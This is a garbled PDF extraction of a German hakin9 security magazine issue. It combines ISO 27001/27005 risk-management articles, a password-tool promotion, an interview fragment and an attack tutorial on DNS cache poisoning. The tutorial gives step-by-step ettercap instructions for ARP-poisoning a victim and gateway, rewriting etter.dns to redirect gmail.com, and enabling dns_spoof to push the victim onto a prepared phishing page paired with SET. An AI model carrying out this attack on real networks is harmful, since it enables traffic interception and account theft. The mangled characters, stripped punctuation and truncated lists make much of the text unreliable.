ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
